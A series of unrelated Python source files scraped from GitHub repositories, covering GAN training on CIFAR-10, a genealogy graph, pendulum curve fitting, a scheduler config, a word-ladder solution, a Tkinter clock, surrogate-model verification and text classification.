Basically it will try to update its weights in such\n# a way so the label of the generated images generated from the first layer is assigned a \n#probablity closer to 1 by the second layer which is the output of the composite layer.\ndef define_gan(g_model, d_model):\n # make weights in the discriminator not trainable\n d_model.trainable = False\n # connect them\n model = Sequential()\n # add generator\n model.add(g_model)\n # add the discriminator\n model.add(d_model)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n model.compile(loss='binary_crossentropy', optimizer=opt)\n return model\n\n\n# train the generator and discriminator\n#Here we train discriminator twice per epoch, separately with fake and real samples.\n#Then we generate latent points and feed that as input to the generator. This time we label\n#the fake images with '1' even though they are fake. This is important because the discriminator\n#will assign a lower probablity that is close to zero to these images. The generator\n#as a result will have a higher loss, meaning the difference between 1 and the probablity assigned\n#by the discriminator. So it will continuously try to generate images in a way so the images\n#are assigned a higher probablity by the discriminator.\ndef train(g_model, d_model, gan_model, dataset, latent_dim, n_epochs=200, n_batch=128):\n bat_per_epo = int(dataset.shape[0] / n_batch)\n half_batch = int(n_batch / 2)\n # manually enumerate epochs\n for i in range(n_epochs):\n # evaluate the model performance, sometimes\n if (i+1) % 10 == 0:\n summarize_performance(i, g_model, d_model, dataset, latent_dim)\n # save the generator model tile file\n filename = 'generator_model_%03d.h5' % (epoch+1)\n g_model.save(filename)\n # enumerate batches over the training set\n for j in range(bat_per_epo):\n # get randomly selected 'real' samples\n X_real, y_real = generate_real_samples(dataset, half_batch)\n # update discriminator model weights\n d_loss1, _ = d_model.train_on_batch(X_real, y_real)\n # generate 'fake' examples\n X_fake, y_fake = generate_fake_samples(g_model, latent_dim, half_batch)\n # update discriminator model weights\n d_loss2, _ = d_model.train_on_batch(X_fake, y_fake)\n # prepare points in latent space as input for the generator\n X_gan = generate_latent_points(latent_dim, n_batch)\n # create inverted labels for the fake samples\n y_gan = ones((n_batch, 1))\n # update the generator via the discriminator's error\n g_loss = gan_model.train_on_batch(X_gan, y_gan)\n # summarize loss on this batch\n print('>%d, %d/%d, d1=%.3f, d2=%.3f g=%.3f' %\n (i+1, j+1, bat_per_epo, d_loss1, d_loss2, g_loss))\n\n\n#To evaluate a performance of gan, unfortunately we need a human operator because we \n#cannot evaluate gan models objectively. So we have three ways to do this.\n#1. After certain number of epochs, calculate the disciminator accuracy and print it.\n#2. After every certain number of epochs, save the generator model.\n#3. 
Save the images generated by the corresponding generator model that we saved.\ndef summarize_performance(epoch, g_model, d_model, dataset, latent_dim, n_samples=150):\n # prepare real samples\n X_real, y_real = generate_real_samples(dataset, n_samples)\n # evaluate discriminator on real examples\n _, acc_real = d_model.evaluate(X_real, y_real, verbose=0)\n # prepare fake examples\n x_fake, y_fake = generate_fake_samples(g_model, latent_dim, n_samples)\n # evaluate discriminator on fake examples\n _, acc_fake = d_model.evaluate(x_fake, y_fake, verbose=0)\n # summarize discriminator performance\n print('>Accuracy real: %.0f%%, fake: %.0f%%' % (acc_real*100, acc_fake*100))\n\n\n# create and save a plot of generated images\n#Function for saving the images generated by the generator model we will save periodically.\ndef save_plot(examples, epoch, n=7):\n # scale from [-1,1] to [0,1]\n examples = (examples + 1) / 2.0\n # plot images\n for i in range(n * n):\n # define subplot\n pyplot.subplot(n, n, 1 + i)\n # turn off axis\n pyplot.axis('off')\n # plot raw pixel data\n pyplot.imshow(examples[i])\n # save plot\n save_plot(x_fake, epoch)\n # save plot to file\n filename = 'generated_plot_e%03d.png' % (epoch+1)\n pyplot.savefig(filename)\n pyplot.close()\n\n\n'''\n# generate samples\n#Generate fake samples using the untrained generator model and plot them.\nmodel = define_generator(latent_dim)\nn_samples = 49\nX, _ = generate_fake_samples(model, latent_dim, n_samples)\n# scale pixel values from [-1,1] to [0,1]\nX = (X + 1) / 2.0\n# plot the generated samples\nfor i in range(n_samples):\n # define subplot\n pyplot.subplot(7, 7, 1 + i)\n # turn off axis labels\n pyplot.axis('off')\n # plot single image\n pyplot.imshow(X[i])\n# show the figure\npyplot.show()\n'''\n\n\n# size of the latent space\nlatent_dim = 100\n# create the discriminator\nd_model = define_discriminator()\n# create the generator\ng_model = define_generator(latent_dim)\n# create the gan\ngan_model = define_gan(g_model, d_model)\n# summarize gan model\ngan_model.summary()\n# plot gan model\n# plot_model(gan_model, to_file='gan_plot.png', show_shapes=True, show_layer_names=True)\n# load image data\n#This is a dummy example to demonstrate how the named entity recognizer will communicate with\n#image generator. 
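`save_plot` above has a slip: instead of saving the grid it just drew, its `# save plot` line calls itself recursively with an undefined `x_fake`. A corrected sketch is below; the analogous `epoch`-versus-loop-variable mismatch also appears in the periodic save inside `train`, whose loop variable is `i`, not `epoch`:

```python
from matplotlib import pyplot

# Corrected save_plot (sketch): plot the n*n grid, then save and close the
# figure -- no recursive call.
def save_plot(examples, epoch, n=7):
    examples = (examples + 1) / 2.0      # [-1, 1] -> [0, 1]
    for i in range(n * n):
        pyplot.subplot(n, n, 1 + i)
        pyplot.axis('off')
        pyplot.imshow(examples[i])
    pyplot.savefig('generated_plot_e%03d.png' % (epoch + 1))
    pyplot.close()
```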
This is very rudimentary and will be updated later.\n#TODO: thorough readup of the spacy library\n#https://spacy.io/\nobjects = NER.extract_objects()\nobjects[0] = 'frog'\ndataset = load_real_samples(objects[0])\n# train model\n# train(g_model, d_model, gan_model, dataset, latent_dim)","repo_name":"Ridi113/python-gan-comics","sub_path":"gan-CIFAR-10-object-image-generation.py","file_name":"gan-CIFAR-10-object-image-generation.py","file_ext":"py","file_size_in_byte":15192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4760807081","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nimport networkx.drawing.nx_pydot as pyd\nimport matplotlib as plt\nimport csv\n\n# read individual data\nindividuals = pd.read_csv(r'C:\\Python\\Graphs\\AHRI_Individuals.csv', sep=',', header=0, index_col=0, dtype={\n 'MotherId': int, 'FatherId': int, 'NodeId': int}, parse_dates=['DoB', 'DoD'])\nindividuals.info()\nG = nx.DiGraph()\nfor row in individuals.itertuples():\n # Add node\n G.add_node(row.Index, sex=row.Sex)\n # Add mother edge\n if row.MotherId != 0:\n G.add_edge(row.MotherId, row.Index, type=2)\n if row.FatherId != 0:\n G.add_edge(row.FatherId, row.Index, type=1)\nwith open(r'C:\\Python\\Graphs\\subgraph_degrees.csv', mode='w') as csv_file:\n fieldnames = ['root', 'degree','parent', 'child', 'type']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for w in nx.weakly_connected_component_subgraphs(G):\n l = nx.topological_sort(w)\n for p, c, t in w.edges(data=True):\n writer.writerow({'root': next(l), 'degree': w.order(),'parent': p, 'child': c, 'type': t['type']})\n csv_file.close()\n","repo_name":"kobusherbst/Networks","sub_path":"code/parental_network.py","file_name":"parental_network.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34155561495","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n#import dei dati\nx, y =np.loadtxt(r'C:\\Users\\ACER\\OneDrive\\Desktop\\Laboratorio I\\esperienze-secondo-semestre\\oscillazioni-accoppiate\\DATI_oscilalzioni_accoppiate\\oscillazionismorzate2_MarcoNico.txt', usecols=(2, 3), unpack=True)\n\n#scartiamo i primi dati, in cui il pendolo era fermo\nx=x[22:1669]\ny=y[22:1669]\ndx=np.full(x.shape, 0.001) #secondi\ndy=np.full(y.shape, 1) #unità arbitrarie\n\n#modello\ndef f(t, a0, tau, w, fi, k):\n return a0*np.exp(-t/tau)*np.cos(w*t + fi) + k\n\n#pguess\np=[134, 35., 4.63, 0., 479]\n\n#fit dei dati\npopt, pcov= curve_fit(f, x, y, p0=p, sigma=dy)\na0_hat, tau_hat, w_hat, fi_hat, k_hat = popt\nda0, dtau, dw, dfi, dk = np.sqrt(pcov.diagonal())\n\n#print parametri di best fit\nprint('Ampiezza di oscillazione', a0_hat, '\\pm', da0)\nprint('tempo di decadimento', tau_hat, '\\pm', dtau)\nprint('pulsazione', w_hat, '\\pm', dw)\nprint('fase', fi_hat, '\\pm', dfi)\nprint('Costante di traslzione', k_hat, '\\pm', dk)\n\n#Calcolo del periodo\nT_hat = (2*np.pi)/w_hat\ndT= (2*np.pi*dw)/(w_hat)**2 \nprint('periodo', T_hat, '\\pm', dT)\n\n\n#residui normalizzati e chisq\nres= (y - f(x, *popt))/dy\nX=np.sqrt(2*1642) \nchisq= np.sum((((y - f(x, *popt))/dy)**2))\nprint(f'Chi quadro = {chisq :.1f}')\nprint('Chisq atteso', 1642, '+/-', X)\n\n#plot\nfig = plt.figure('Pendolo_singolo_smorzato')\nax1, ax2 = fig.subplots(2, 1, sharex=True, gridspec_kw=dict(height_ratios=[2, 1], hspace=0.05))\nax1.errorbar(x[::3], 
y[::3], dy[::3], dx[::3], fmt='.', label='Dati', color='midnightblue')\nax1.plot(x, f(x, *popt), label='Modello di best-fit', color='deepskyblue')\nax1.set_ylabel('ampiezza [a. u.]')\nax1.grid(color='lightgray', ls='dashed')\nax1.legend()\nax2.errorbar(x[::3], res[::3], dy[::3], fmt='.', color='midnightblue')\nax2.plot(x, np.full(x.shape, 0.0), color='deepskyblue')\nax2.set_xlabel('tempo [secondi]')\nax2.set_ylabel('Residui normalizzati [a. u.]')\nax2.grid(color='lightgray', ls='dashed')\nplt.ylim(-12, 14)\nplt.xlim(26, 28.5)\nfig.align_ylabels((ax1, ax2))\n#fig2= plt.figure('residui 2')\n#plt.errorbar(res[::3], x[::3], dx[::3], fmt='.')\n#plt.plot\nplt.show()","repo_name":"NicoloBottiglioni/Laboratorio-I","sub_path":"esperienze-secondo-semestre/oscillazioni-accoppiate/CODICI_oscillazioni_accoppiate/Pendolo_singolo_smorzato.py","file_name":"Pendolo_singolo_smorzato.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70238085370","text":"import pickle\nimport os\n\n# File contains configuration for the simulation\n\nREAL_TIME = False # which mode the scheduler should run in\nHAS_DISPLAY = False # displays a window if True\nFV_OPTIMISATION = False # whether we are using the optimisation version\nRUN_ALL_MODES = True\nSCHEDULER_MODE = \"fv\" # can be fv, rr or edf\nSHARED_DIR = \"shared\"\nDETAILS_DIR = \"details\"\nMEDIA_DIR = \"media\"\nRESULTS_DIR = \"output\"\nGRAPHS_DIR = \"graph\"\nFPS_SCALE = 1 / 10\nSCREEN_MAX_WIDTH = 1280\nSCREEN_MAX_HEIGHT = 720\nREGRESSION_MODEL_PATH = \"multiple_regression.sav\"\n\ndef get_resized_dim(frame):\n width = int(frame.shape[1])\n height = int(frame.shape[0])\n\n if width> SCREEN_MAX_WIDTH:\n height = round(height* SCREEN_MAX_WIDTH/width)\n width = SCREEN_MAX_WIDTH\n\n if height> SCREEN_MAX_HEIGHT:\n width = round(width* SCREEN_MAX_HEIGHT/height)\n height = SCREEN_MAX_HEIGHT\n \n return (width,height)\n\ndef save_regression_model(model):\n file_path = os.path.join(SHARED_DIR, DETAILS_DIR, REGRESSION_MODEL_PATH)\n pickle.dump(model, open(file_path, \"wb\"))\n\ndef load_regression_model():\n file_path = os.path.join(SHARED_DIR, DETAILS_DIR, REGRESSION_MODEL_PATH)\n return pickle.load(open(file_path, \"rb\"))\n\ndef get_csv_paths(vid_file, is_prediction):\n files = [vid_file[:-4] + \"_content.csv\",\n vid_file[:-4] + \"_dynamism.csv\",\n vid_file[:-4] + \"_impact.csv\",\n vid_file[:-4] + \"_total.csv\"]\n if is_prediction:\n files = [\"predicted_\" + _file for _file in files]\n files = [os.path.join(SHARED_DIR, RESULTS_DIR, _file) for _file in files]\n \n return files\n\ndef get_plot_path(path):\n return os.path.join(SHARED_DIR, GRAPHS_DIR,path)\n\n ","repo_name":"R-chard/Real-time-Video-Scheduler","sub_path":"shared/details/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32919372003","text":"\"\"\"\nLeetcode problem 127: https://leetcode.com/problems/word-ladder/description/\n\"\"\"\n\nfrom collections import deque, defaultdict\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList:\n return 0\n\n if beginWord not in wordList:\n wordList.append(beginWord) \n \n graph = self.form_graph(wordList) \n \n return self.bfs(graph, beginWord, endWord) \n \n def form_graph(self, wordList):\n graph = defaultdict(list) \n\n for word in wordList:\n for i 
in range(len(word)):\n prefix = word[:i]\n pattern = prefix + \"*\" + word[i + 1:] \n graph[pattern].append(word) \n \n return graph \n \n def bfs(self, graph, beginWord, endWord): \n start_queue = deque([beginWord])\n end_queue = deque([endWord]) \n start_visited = set([beginWord])\n end_visited = set([endWord]) \n distance = 0\n\n while start_queue and end_queue:\n distance += 1 \n if self.find_joint(graph, start_queue, start_visited, end_visited):\n return distance \n \n distance += 1\n if self.find_joint(graph, end_queue, end_visited, start_visited):\n return distance \n \n return 0 \n \n def find_joint(self, graph, queue, visited, opposite_visited):\n for _ in range(len(queue)):\n cur = queue.popleft() \n if cur in opposite_visited:\n return True \n for i in range(len(cur)):\n prefix = cur[:i]\n pattern = prefix + \"*\" + cur[i + 1:] \n for n in graph[pattern]:\n if n in visited:\n continue \n visited.add(n)\n queue.append(n) \n \n return False \n\n\n ","repo_name":"sherry-debug715/Algorithms-notes","sub_path":"BFS/bidirectionalBFS/wordLadder.py","file_name":"wordLadder.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33788992437","text":"states = {\n\t\"Lucy\": \"Cedric\",\n\t\"Ennie\": \"Joyce\",\n\t\"Maria\": \"Putini\",\n\t\"Mamorake\": \"Danny\",\n\t\"Mavis\": \"Foster\",\n\t\"Isahai\": \"Koketso\",\n\t\"Oupa\": \"keMolebetse\",\n\t\"Nathaniel\": None,\n\t\"Junior\": \"Lethabo\",\n}\n\ncities = {\n\t1: \"Johannesburg\",\n\t2: \"Cape Town\",\n\t3: \"Durban\",\n\t4: \"Germiston\",\n\t5: \"Pretoria\",\n\t6: \"Port Elizabeth\",\n\t7: \"East London\",\n\t8: \"Bloemfontein\"\n}\n\ncities[9] = \"Soweto\"\ncities[10] = \"Pietermaritzburg\"\n\nprint(\"-\"*10)\nprint(\"Lucy's firsborn is: \", states[\"Lucy\"])\nprint(\"Nathaniel's firsborn is: \", states[\"Nathaniel\"])\n\n\nprint(\"-\"*10)\nfor i, city in list(cities.items()):\n\tprint(f\"{i} has the city {city}\")\n","repo_name":"Thadishi/PythonPrac","sub_path":"learnPythonTheHardWay/states39.py","file_name":"states39.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1180920107","text":"#by forever1296\r\n#패키지 import\r\nimport requests\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\n\r\n#오늘 날짜\r\nnow_all = datetime.now()\r\nnow_want = now_all.strftime('%Y%m%d')\r\n\r\n# n,m = 월\r\nn = 0\r\nm = 1\r\ncount = 1\r\n\r\n#월 01~05 08~12 변경위한 while문\r\nwhile count!=11:\r\n # 해당 url에서 html을 불러옴.\r\n url = requests.get('https://sports.news.naver.com/wfootball/schedule/index.nhn?year=2019&month='+ str(n) + str(m) +'&category=epl?_=1528970517325')\r\n urlc = url.content\r\n html = BeautifulSoup(urlc,\"html.parser\")\r\n #저장된 html에서 find_all 함수를 이용하여 원하는 태그유형,이름을 찾음.\r\n #변수.find(\"태그명\",{\"타입\":\"찾고자하는클래스명\"}\r\n data = str(html.find_all(\"script\",{\"type\":\"text/javascript\"}))\r\n\r\n #저장이 정상적으로 되었는지 확인.\r\n #print(data)\r\n\r\n #split 구현 \"을 기준으로 구분하여 배열로 저장.\r\n sdata = data.split('\"')\r\n\r\n #split 정상적으로 되었는지 확인\r\n #print(sdata[6])\r\n\r\n #필요한 데이터 -> date / scheduleList / homeTeamName / awayTeamName / homeTeamScore / awayTeamScore / state 등\r\n i = 0\r\n rdata = list()\r\n #len(sdata) 크기 확인\r\n #print(len(sdata))\r\n\r\n #while문을 이용하여 필요한 데이터 저장\r\n while i 1~12월 / i = while문 반복횟수 -> 
len(sdata)\r\n","repo_name":"tegueneeeee/SportsInfoAnalysts","sub_path":"schedule_epl.py","file_name":"schedule_epl.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2040447740","text":"# from tkinter import *\n\n# from time import strftime\n\n# root = Tk()\n\n# root.title('Digital clock')\n\n# def clock():\n# \ttick = strftime('%H:%M:%S %p')\n\n# \tlabel.config(text =tick)\n\n# \tlabel.after(1000, clock)\n\n# label = Label(root, font =('sans', 80), background = 'black', foreground = 'red')\n\n# label.pack(anchor= 'center')\n\n# clock()\n# mainloop()\n\n\nfrom tkinter import *\nimport time\nroot = Tk()\nroot.title(\"Digital Clock\")\ndef clock() : \n tick = time.strftime(\"%H : %M : %S %p\")\n # tick = time.strftime(\"%X\")\n label.config(text = tick) \n label.after(1000,clock)\n\n\nlabel1 = Label(root,text = \"Digital Clock\",font = (\"arial\",20),bg = \"yellow\",fg = \"blue\")\nlabel = Label(root,font = (\"arial\",20),background = \"black\",foreground = \"red\")\nbtn=Button(root, text=\"This is Button widget\", fg='blue')\n\ntxtfld=Entry(root, text=\"This is Entry Widget\", bd=5)\n\n# label1.place(x=50,y=40)\nlabel.place(x=45,y=100)\nbtn.place(x=80, y=200)\ntxtfld.place(x=80, y=150)\nlabel1.pack()\n# label.pack()\n# btn.pack()\nclock()\nroot.configure(background=\"#00ffff\")#hexa decimal gb color values\nroot.geometry(\"400x250+300+400\")\nroot.mainloop()\n\n","repo_name":"nidhics/All_Python","sub_path":"level2 5-8/Digital clock 9/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26021302822","text":"import copy\nimport multiprocessing\n\nimport numpy as np\nfrom joblib import Parallel, delayed\nfrom sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nfrom .KrigingSMT import predictKriging, verifyKriging\nfrom .RBFRoy import replaceKernel, predictRoyRBFmodel, verifyRoyRBFmodel\nfrom .RandomForest import createRandomForest, predictRandomForest\nfrom .SVMSklearn import predictSVM, verifySVM\n\n\n# Do model verification\ndef ModelVerification(mixint, x, y, KrgTypes, RBFconfigs, RBFKernels, SVMconfig, RFconfig,\n fCrit, evall, time_limit=35, nCPU=None,\n nTotal=None):\n \"\"\"\n Input arguments\n mixint: mixed-integer context of SMT python package (required)\n x: the initial samples (required)\n y: the real objective values of initial samples x (required)\n ### At least one of the following models shall be specified ###\n KrgTypes: type of Kriging model, example: itertool ['constant', 'linear', 'quadratic'] × [‘abs_exp’, ‘squar_exp’, ‘act_exp’, ‘matern52’, ‘matern32’, ‘gower’]\n RBFconfigs: general RBF config, [ptail(polynomial tail), squares, smooth, Kernel]\n RBFKernels: alternative kernels for RBF model\n SVMcondig: type of SVM regression model, see defaultSVMsettings(nVar) in SVMSklearn.py (required)\n RFconfig: config for random forest (optional)\n\n fCrit: metrics to select the best model, mean squared error or mean absolute error or R squared\n Shall be a sklearn API\n evall: number of samples\n\n Optional arguments\n time_limit: the hard limit for running time\n nCPU: number of available (CPU) processes of the computer\n nTotal: number of models that survive the verification, namely, top-T\n Shall be less than nCPU or 2*nCPU depending on the hardware specifications\n\n 
@return: the configurations of survived models and the models themself\n KrgNewTypes, KrgNewModels, len(KrgNewTypes), RBFNewKernels, RBFNewModels, len(\n RBFNewKernels), SVMConfig, SVMModels, len(SVMConfig), RFNewConfig, RFModel, len(RFNewConfig)\n \"\"\"\n\n # If we have less than 100 samples, do not split\n # Only calculate training errors\n if x.shape[0] < 100:\n X_train = x\n X_test = x\n y_train = y\n y_test = y\n else:\n X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n # X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n # Initialize settings\n KrgModels = []\n RBFModels = []\n SVMNewModels = []\n SVMNewConfig = []\n RFNewConfig = []\n if nCPU is None:\n nCPU = multiprocessing.cpu_count() - 2\n if nTotal is None:\n nTotal = nCPU * 2\n nKriging = len(KrgTypes)\n nRBF = len(RBFKernels)\n nSVM = len(SVMconfig)\n nRF = len(RFconfig)\n # pool = multiprocessing.Pool(processes=nCPU)\n par = Parallel(n_jobs=nTotal)\n # print(\"Start verifying models...\")\n newKrgLoss = []\n newRBFLoss = []\n SVMNewLoss = []\n RFLoss = []\n if nKriging > 0:\n # Create all Kriging models\n KrgModels = [[] for i in range(nKriging)]\n process = [(copy.deepcopy(mixint), copy.deepcopy(X_train), copy.deepcopy(y_train), KrgTypes[modi][0],\n KrgTypes[modi][1], KrgTypes[modi][2], evall) for modi in range(nKriging)]\n KrgModels = par(delayed(verifyKriging)(p) for p in process)\n # Locate 'survived' kriging models\n KrgNonInd = [i for i, val in enumerate(KrgModels) if val is not None]\n nKriging = len(KrgNonInd)\n newKrgModels = [[] for i in range(nKriging)]\n newKrgTypes = [[] for i in range(nKriging)]\n\n for inew, iold in enumerate(KrgNonInd):\n if KrgModels[iold][1] <= time_limit:\n newKrgModels[inew] = KrgModels[iold][0]\n newKrgTypes[inew] = KrgTypes[iold]\n\n # Rank Kriging models and select top nCPU\n # nBatch = math.ceil(nKriging / nCPU)\n KrgLoss = np.empty(nKriging)\n krgResults = [[] for i in range(nKriging)]\n\n process = [(copy.deepcopy(X_test), copy.deepcopy(newKrgModels[model]), False) for model in range(nKriging)]\n # krgResults = pool.map(predictSMTKrigingModel, process)\n krgResults = par(delayed(predictKriging)(p) for p in process)\n # pool.close()\n # evaluate Kriging\n for ind, result in enumerate(krgResults):\n result = np.reshape(result, (y_test.shape[0], -1))\n KrgLoss[ind] = fCrit(y_test, result)\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(KrgLoss)\n elif fCrit is r2_score:\n index = np.argsort(-KrgLoss)\n else:\n raise NotImplementedError\n # index = index.astype(int)\n nSize = nCPU if nKriging > nCPU else nKriging\n KrgTypes = [[] for i in range(nSize)]\n KrgModels = [[] for i in range(nSize)]\n newKrgLoss = [np.inf] * nSize\n for i in range(nSize):\n newKrgLoss[i] = KrgLoss[index[i]]\n KrgTypes[i] = newKrgTypes[index[i]]\n KrgModels[i] = newKrgModels[index[i]]\n print(\"Krigings have been verified\")\n\n # Create all RBF models\n if nRBF > 0:\n # Create all Kriging models\n RBFModels = [[] for i in range(nRBF)]\n process = [\n (copy.deepcopy(X_train), copy.deepcopy(y_train), copy.deepcopy(replaceKernel(RBFconfigs, RBFKernels, modi)),\n evall) for modi in range(nRBF)]\n # RBFModels = pool.map(createRoyRBFmodel, process)\n RBFModels = par(delayed(verifyRoyRBFmodel)(p) for p in process)\n # pool.close()\n\n RBFNonInd = [i for i, val in enumerate(RBFModels) if val is not None]\n nRBF = len(RBFNonInd)\n newRBFModels = [[] for i in range(nRBF)]\n newRBFKernels = [[] for i in range(nRBF)]\n\n for inew, 
iold in enumerate(RBFNonInd):\n if RBFModels[iold][1] <= time_limit:\n newRBFModels[inew] = RBFModels[iold][0]\n newRBFKernels[inew] = RBFKernels[iold]\n\n # nBatch = math.ceil(nRBF / nCPU)\n # Rank Kriging models and select top nCPU\n RBFLoss = np.empty(nRBF)\n RBFResults = [[] for i in range(nRBF)]\n process = [(copy.deepcopy(X_test), copy.deepcopy(newRBFModels[int(model)]), False) for model in range(nRBF)]\n # RBFResults = pool.map(predictRoyRBFmodel, process)\n RBFResults = par(delayed(predictRoyRBFmodel)(p) for p in process)\n\n # evaluate RBF\n for ind, result in enumerate(RBFResults):\n result = np.reshape(result, (y_test.shape[0], -1))\n RBFLoss[ind] = fCrit(y_test, result)\n\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(RBFLoss)\n elif fCrit is r2_score:\n index = np.argsort(-RBFLoss)\n else:\n raise NotImplementedError\n nSize = nCPU if nRBF > nCPU else nRBF\n RBFKernels = [[] for i in range(nSize)]\n RBFModels = [[] for i in range(nSize)]\n newRBFLoss = [np.inf] * nSize\n for i in range(nSize):\n newRBFLoss[i] = RBFLoss[index[i]]\n RBFKernels[i] = newRBFKernels[index[i]]\n RBFModels[i] = newRBFModels[index[i]]\n print(\"RBFs have been verified\")\n\n if nSVM > 0:\n process = [\n (copy.deepcopy(X_train), copy.deepcopy(y_train.flatten()), conf[0], conf[1], conf[2], conf[3], conf[4],\n conf[5]) for conf in\n SVMconfig]\n # each process loads: X, Y, k, d, c, e, cache_size, max_iter= arguments\n SVMModels = par(delayed(verifySVM)(p) for p in process)\n process = [\n (copy.deepcopy(X_test), copy.deepcopy(model[0])) for model in SVMModels if model[1] <= time_limit]\n SVMResults = par(delayed(predictSVM)(p) for p in process)\n SVMLoss = np.empty(nSVM)\n for ind, result in enumerate(SVMResults):\n result = np.reshape(result, (y_test.shape[0], -1))\n SVMLoss[ind] = fCrit(y_test, result)\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(SVMLoss)\n elif fCrit is r2_score:\n index = np.argsort(-SVMLoss)\n else:\n raise NotImplementedError\n nSize = nCPU if nSVM > nCPU else nSVM\n SVMNewConfig = [[] for i in range(nSize)]\n SVMNewModels = [[] for i in range(nSize)]\n SVMNewLoss = [np.inf] * nSize\n for i in range(nSize):\n SVMNewLoss[i] = SVMLoss[index[i]]\n SVMNewConfig[i] = SVMconfig[index[i]]\n SVMNewModels[i] = SVMModels[index[i]][0]\n print(\"SVMs have been verified\")\n\n if nRF > 0:\n ## We only have one RF config by default,\n ## so setting time limit for random forest is not in our consideration\n rfmodel = createRandomForest((copy.deepcopy(X_train), copy.deepcopy(y_train.flatten())))\n rfresult = predictRandomForest((copy.deepcopy(X_test), rfmodel, False))\n # rfresult = np.reshape(rfresult, (y.shape[0], -1))\n RFLoss = fCrit(y_test, rfresult)\n RFconfig = ['default']\n print(\"RF has been verified\")\n\n AllLoss = newKrgLoss + newRBFLoss + SVMNewLoss + [RFLoss]\n Allconfig = KrgTypes + RBFKernels + SVMNewConfig + RFconfig\n nKriging = len(KrgModels)\n nRBF = len(RBFModels)\n nSVM = len(SVMNewModels)\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(AllLoss)\n index = list(index)\n elif fCrit is r2_score:\n index = np.argsort(AllLoss)\n new_index = np.flip(index)\n index = list(new_index)\n else:\n raise NotImplementedError\n nSize = nTotal if len(index) > nTotal else len(index)\n idKrg = 0\n idRBF = 0\n idSVM = 0\n RBFNewKernels = []\n RBFNewModels = []\n KrgNewTypes = []\n KrgNewModels = []\n SVMModels = []\n SVMConfig = []\n RFModel = []\n RFconfig = []\n\n for i in 
range(nSize):\n if index[i] < nKriging and nKriging > 0:\n KrgNewTypes.append(KrgTypes[index[i]])\n KrgNewModels.append(KrgModels[index[i]])\n idKrg += 1\n elif nKriging <= index[i] < nKriging + nRBF and nRBF > 0:\n RBFNewKernels.append(RBFKernels[index[i] - nKriging])\n RBFNewModels.append(RBFModels[index[i] - nKriging])\n idRBF += 1\n elif nKriging + nRBF <= index[i] < nKriging + nRBF + nSVM and nSVM > 0:\n SVMModels.append(SVMNewModels[index[i] - (nKriging + nRBF)])\n SVMConfig.append(SVMNewConfig[index[i] - (nKriging + nRBF)])\n idSVM += 1\n elif index[i] == nKriging + nRBF + nSVM and nRF > 0:\n RFModel = [rfmodel]\n RFNewConfig = ['default']\n nRF = 1\n\n print('Model verification is done!')\n return KrgNewTypes, KrgNewModels, len(KrgNewTypes), RBFNewKernels, RBFNewModels, len(\n RBFNewKernels), SVMConfig, SVMModels, len(SVMConfig), RFNewConfig, RFModel, len(RFNewConfig)\n","repo_name":"BaronH07/SAMA-DiEGO","sub_path":"Codes/ThesisCode/ModelVerification.py","file_name":"ModelVerification.py","file_ext":"py","file_size_in_byte":11079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72708945530","text":"# Imports the Google Cloud client library\nfrom google.cloud import language_v2\nimport pandas as pd\nimport json\nfrom tqdm import tqdm\n\n# Instantiates a client\nclient = language_v2.LanguageServiceClient()\n\npheme = pd.read_csv('datasets\\pheme2.csv')\ntwitter = pd.read_csv('datasets\\\\twitter2.csv')\nweibo = pd.read_csv('datasets\\\\weibo.csv')\n\ndef classify(text, verbose=True):\n \"\"\"Classify the input text into categories.\"\"\"\n\n language_client = language_v2.LanguageServiceClient()\n\n document = language_v2.Document(\n content=text, type_=language_v2.Document.Type.PLAIN_TEXT\n )\n response = language_client.classify_text(request={\"document\": document})\n categories = response.categories\n\n result = {}\n\n for category in categories:\n # Turn the categories into a dictionary of the form:\n # {category.name: category.confidence}, so that they can\n # be treated as a sparse vector.\n result[category.name] = category.confidence\n\n if verbose:\n print(text)\n for category in categories:\n print(\"=\" * 20)\n print(\"{:<16}: {}\".format(\"category\", category.name))\n print(\"{:<16}: {}\".format(\"confidence\", category.confidence))\n\n return result\n\ndef parse_table(table, write_file):\n results = {}\n entry_number = 0\n for text in tqdm(table):\n try:\n result = classify(text, verbose=False)\n results[entry_number] = result\n entry_number += 1\n except Exception:\n print(f\"Error processing Entry Number {entry_number}\")\n entry_number += 1\n with open(write_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(results, ensure_ascii=False))\n 